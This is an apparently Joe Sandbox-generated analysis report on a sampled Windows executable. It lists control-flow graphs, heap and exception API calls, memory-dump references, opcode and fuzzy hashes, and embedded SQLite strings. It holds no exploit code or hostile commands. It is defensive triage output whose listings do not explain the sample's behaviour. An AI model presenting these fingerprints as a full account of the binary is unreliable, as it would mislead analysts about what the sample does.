                                                                                    • Opcode Fuzzy Hash: b54121794e8d50cf0c67dd1dd1a3a1254fd6c6fc93c71a6bedaeec662d4b0b05
                                                                                    • Instruction Fuzzy Hash: F0113AB5E041099BCB04DF98D981BBFB7F9EB89704F2045A9E415A7781DB35AE00CBA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 122 bf7ddf-bf7df7 123 bf7df9-bf7dfc 122->123 124 bf7e26-bf7e48 KiUserExceptionDispatcher 122->124 125 bf7dfe-bf7e1a 123->125 126 bf7e1c-bf7e1f 123->126 125->124 125->126 126->124 127 bf7e21 126->127 127->124
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00BF5F7E,?,?,?,00BF5F7E,00BBD963,00C4FEC4,00BBD963), ref: 00BF7E3F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 443432e3f7358a30273ceecbbe57dd7714301fd4762eab9761b5ff338f28e4f6
                                                                                    • Instruction ID: 8d1737859974e06d6f995bdabd1473b3af1ea04fb3d88e9b3d598d11cd727a52
                                                                                    • Opcode Fuzzy Hash: 443432e3f7358a30273ceecbbe57dd7714301fd4762eab9761b5ff338f28e4f6
                                                                                    • Instruction Fuzzy Hash: 2801A235900209ABD7019F58D980BAEBBF9FF48710F1541DAEA04AB7A1DB70ED05CB90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 130 c0d7fc-c0d807 131 c0d815-c0d81b 130->131 132 c0d809-c0d813 130->132 134 c0d834-c0d845 RtlAllocateHeap 131->134 135 c0d81d-c0d81e 131->135 132->131 133 c0d849-c0d854 call bff0a9 132->133 141 c0d856-c0d858 133->141 137 c0d820-c0d827 call c0b302 134->137 138 c0d847 134->138 135->134 137->133 143 c0d829-c0d832 call c0807d 137->143 138->141 143->133 143->134
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,00BBD963,00000000,?,00C0D423,00000001,00000364,00000006,000000FF,?,00000000,?,00BFF0AE,00C0D570), ref: 00C0D83D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 95bf0c378fd22682d0d70cd25cda6cde031f251b718deb7a6d939edb3a846333
                                                                                    • Instruction ID: 4bd77edfa73175c47da2adc9f3fa6b1c10ce6838671613dd30d4f6ada0fdb54b
                                                                                    • Opcode Fuzzy Hash: 95bf0c378fd22682d0d70cd25cda6cde031f251b718deb7a6d939edb3a846333
                                                                                    • Instruction Fuzzy Hash: 59F0E232605225ABDB316BE69C06B6B3788AFC0770B14C225EC2BE71D1CE20DD01CAE0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 146 ba39b0-ba39c5 147 ba39cc-ba39d0 call ba75f0 146->147 148 ba39c7 call ba92b0 146->148 151 ba39d5-ba39d8 147->151 148->147 152 ba39db-ba39df 151->152 153 ba39e3-ba39ea call bfbae2 152->153 154 ba39e1 152->154 155 ba39ec-ba39ee 153->155 154->155 155->152 158 ba39f0-ba3a13 155->158
                                                                                    APIs
                                                                                    • Concurrency::cancel_current_task.LIBCPMTD ref: 00BA39C7
                                                                                      • Part of subcall function 00BA92B0: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00BA92B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
                                                                                    • String ID:
                                                                                    • API String ID: 2103942186-0
                                                                                    • Opcode ID: a7917625a3eb7a81a09c01dbe8a5b39c91b5f0b15953effb3269a63bd19d273d
                                                                                    • Instruction ID: 4e22de05f7252dcb40acb34ba3bcab9d4d612807c9cb14cdc726338d1096bd1e
                                                                                    • Opcode Fuzzy Hash: a7917625a3eb7a81a09c01dbe8a5b39c91b5f0b15953effb3269a63bd19d273d
                                                                                    • Instruction Fuzzy Hash: 7DF03C74E0860CABCB04EFA8C482A9EBBF5EF45704F2481E9F80697345E6709F40DB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 159 c0d52d-c0d539 160 c0d56b-c0d576 call bff0a9 159->160 161 c0d53b-c0d53d 159->161 168 c0d578-c0d57a 160->168 163 c0d556-c0d567 RtlAllocateHeap 161->163 164 c0d53f-c0d540 161->164 166 c0d542-c0d549 call c0b302 163->166 167 c0d569 163->167 164->163 166->160 171 c0d54b-c0d554 call c0807d 166->171 167->168 171->160 171->163
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00BF51FC,00000000,00000000,00BB42D7,00000008), ref: 00C0D55F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 8271211805d1bbb9e705c051ff3ddfa13f4e0ee351ccfc181d72591edad06fe1
                                                                                    • Instruction ID: 337ee195b77a056e34a4a0f58f13a8e42f4eef24716690183e88bc48508e2e8f
                                                                                    • Opcode Fuzzy Hash: 8271211805d1bbb9e705c051ff3ddfa13f4e0ee351ccfc181d72591edad06fe1
                                                                                    • Instruction Fuzzy Hash: 3CE09BB151162157DB3166FA9C15B6B7A4C9F823B9F150121BC67D71D1CF50CF00D2E5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 174 bae7e0-bae801 call bfef66 call bac660 178 bae806-bae819 174->178
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __vfwprintf_l
                                                                                    • String ID:
                                                                                    • API String ID: 1051920573-0
                                                                                    • Opcode ID: 61109263298086635f4f9867012c76f88e76e10fd03ef8637998cc65461ff227
                                                                                    • Instruction ID: bd8d3729ba8fb097efd7d8948c90d9d073531d50794fef1212453b1252fef643
                                                                                    • Opcode Fuzzy Hash: 61109263298086635f4f9867012c76f88e76e10fd03ef8637998cc65461ff227
                                                                                    • Instruction Fuzzy Hash: 1BE0BFB5D0020CFFEB00EF94D946BAEBBB8DB44714F1081A9ED0897341E671AB548BD2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 179 ba9a00-ba9a24 call baaec0 call ba3bf0 call ba9a30 185 ba9a29-ba9a2c 179->185
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: char_traits
                                                                                    • String ID:
                                                                                    • API String ID: 1158913984-0
                                                                                    • Opcode ID: c6431b898baa3358c9616c2831d7f7a86893db0058214024233c443588338829
                                                                                    • Instruction ID: 7d41aecbd860a7bc7167b446541d7035236a93ef848fa83412dcadd42935bd4b
                                                                                    • Opcode Fuzzy Hash: c6431b898baa3358c9616c2831d7f7a86893db0058214024233c443588338829
                                                                                    • Instruction Fuzzy Hash: 94D012F5D0810877CA04EB94EC02C5B77DD9B15314B0041A9F90993201D931AA1096E6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 186 bfbc38-bfbc4b call c0d859 188 bfbc50-bfbc52 186->188
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00BFBC4B
                                                                                      • Part of subcall function 00C0D859: RtlFreeHeap.NTDLL(00000000,00000000,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?), ref: 00C0D86F
                                                                                      • Part of subcall function 00C0D859: GetLastError.KERNEL32(?,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?,?), ref: 00C0D881
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                    • String ID:
                                                                                    • API String ID: 1353095263-0
                                                                                    • Opcode ID: 5c07b94d7deb13df39564b4785ba310e6ef333d7d5c5a94b49bdf3203c9c6419
                                                                                    • Instruction ID: 98a4d02faf75258c17f2c0ec07e0a14d1a38a276550b90a138cd463ef54619f1
                                                                                    • Opcode Fuzzy Hash: 5c07b94d7deb13df39564b4785ba310e6ef333d7d5c5a94b49bdf3203c9c6419
                                                                                    • Instruction Fuzzy Hash: A9C04C71510208FBDB05AB85D916B4E7BA9DB80368F204158F41667691DAB1EE44EA90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);$altertab_$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$corrupt database$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$unknown database %T$views may not be indexed$virtual tables may not be indexed
                                                                                    • API String ID: 0-4131144391
                                                                                    • Opcode ID: 17277ba66024331f114f2169b438342c8cda9c3e03ce3731c217bb60296da180
                                                                                    • Instruction ID: 1126e00d1ee331d90709f32a1b6f4184c431948628313d5dd898f74afe36142d
                                                                                    • Opcode Fuzzy Hash: 17277ba66024331f114f2169b438342c8cda9c3e03ce3731c217bb60296da180
                                                                                    • Instruction Fuzzy Hash: D4C277746086429FC724DF29C490B2AB7E2FF89314F1985EDE8899B392D735EC45CB81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 2nd reference to page %d$Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)$Child page depth differs$Extends off end of page$Failed to read ptrmap key=%d$Fragmentation of %d bytes reported as %d on page %d$Multiple uses for byte %u of page %d$Offset %d out of range %d..%d$Rowid %lld out of order$btreeInitPage() returns error code %d$invalid page number %d$unable to get the page. error code=%d
                                                                                    • API String ID: 0-1545182708
                                                                                    • Opcode ID: a40642aac4a41c03692208eb6fbe4a117ef935490d7ea053a878a51adeef2c00
                                                                                    • Instruction ID: 070cb4a82d41230528db7514b74b5e5b56bf1a9aedb10df52a53bffe2afb857b
                                                                                    • Opcode Fuzzy Hash: a40642aac4a41c03692208eb6fbe4a117ef935490d7ea053a878a51adeef2c00
                                                                                    • Instruction Fuzzy Hash: 5C428CB46083419FD724DF18C881A6ABBE5FF89300F2849ADF899C7356D734E945CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s: %s$%s: %s.%s$%s: %s.%s.%s$ROWID$ambiguous column name$misuse of aliased aggregate %s$new$no such column$old$row value misused
                                                                                    • API String ID: 0-690255045
                                                                                    • Opcode ID: 1a39f2aac9886488065e3bb097166220e58a913d2a64f14bfd5f02da6a7396c1
                                                                                    • Instruction ID: 0756d3c1ffab5090d96b71ea73623de3f6dcd4f8c84aea906ab1ebebf3287f3c
                                                                                    • Opcode Fuzzy Hash: 1a39f2aac9886488065e3bb097166220e58a913d2a64f14bfd5f02da6a7396c1
                                                                                    • Instruction Fuzzy Hash: E9728A716083918FC714CF29C090A6BBBE1FF89314F19859DE9999B352C731EE41EB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$main$misuse$temp
                                                                                    • API String ID: 0-2519378998
                                                                                    • Opcode ID: 0432c2db584e9aed018c7f2c65263bfe16f7e5d5970f5558b158b47467bec0f9
                                                                                    • Instruction ID: 47aedcf5b7eb07812f8d109d103285b4a2345edf44537d911a84bb5d43397244
                                                                                    • Opcode Fuzzy Hash: 0432c2db584e9aed018c7f2c65263bfe16f7e5d5970f5558b158b47467bec0f9
                                                                                    • Instruction Fuzzy Hash: 4A1219B46087009FE720DF28DC45B6B77E5FF45304F0449ACE58A97282D775E989CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %!.15g$%02x$%lld$'%.*q'$-- $NULL$NULL$`$$d$zeroblob(%d)
                                                                                    • API String ID: 0-425311666
                                                                                    • Opcode ID: 6b651664883448c77ca83c50a384fb40f1e4a9234b3fff5eee79115b20df7d2d
                                                                                    • Instruction ID: 97a447d29c1c5f3677f19c446bcffeac6ce8ac949532ab53a4a1ed596c0cb635
                                                                                    • Opcode Fuzzy Hash: 6b651664883448c77ca83c50a384fb40f1e4a9234b3fff5eee79115b20df7d2d
                                                                                    • Instruction Fuzzy Hash: 8CF1AE715087408FD724DF28D845BAAB7E5FFC5304F2849AEF9A6872A1DB31E845CB42
                                                                                    Strings
                                                                                    • INTERSECT, xrefs: 00B4B604
                                                                                    • EXCEPT, xrefs: 00B4B60B
                                                                                    • GROUP, xrefs: 00B4B529
                                                                                    • all VALUES must have the same number of terms, xrefs: 00B4B5D4
                                                                                    • SELECTs to the left and right of %s do not have the same number of result columns, xrefs: 00B4B618
                                                                                    • aggregate functions are not allowed in the GROUP BY clause, xrefs: 00B4B5C4
                                                                                    • UNION ALL, xrefs: 00B4B612, 00B4B617
                                                                                    • ORDER, xrefs: 00B4B4F9
                                                                                    • UNION, xrefs: 00B4B5FD
                                                                                    • a GROUP BY clause is required before HAVING, xrefs: 00B4B59D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
